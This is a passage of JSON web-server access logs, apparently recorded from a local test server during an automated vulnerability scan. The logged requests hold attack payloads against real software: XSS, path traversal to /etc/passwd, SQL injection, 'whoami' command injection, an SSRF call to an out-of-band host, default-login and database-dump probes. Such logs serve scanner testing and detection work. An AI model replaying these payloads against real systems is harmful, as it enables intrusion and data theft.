"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event3=352513&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mrtg/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CDocuments+and+Settings\x5CAll+Users\x5CApplication+Data\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sphinx-graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MRTG/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"wimToken=&userid_work=&userid=YWRtaW4=&password_work=&password=&open=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/registry-clients HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /counters HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.171","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.171","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translate.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"1.173","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /flow/registries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlrpc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system-diagnostics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/297MU0p6zJJGMaPotRTSPMRvH6j/)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nifi-api/access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://c9v8h8gsmpv8c1qg07h0hyr95oe3yassd.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.173","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fpui/loginServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/css/297MTmkkG4lECzjnF1EJeuOl9Fs.css 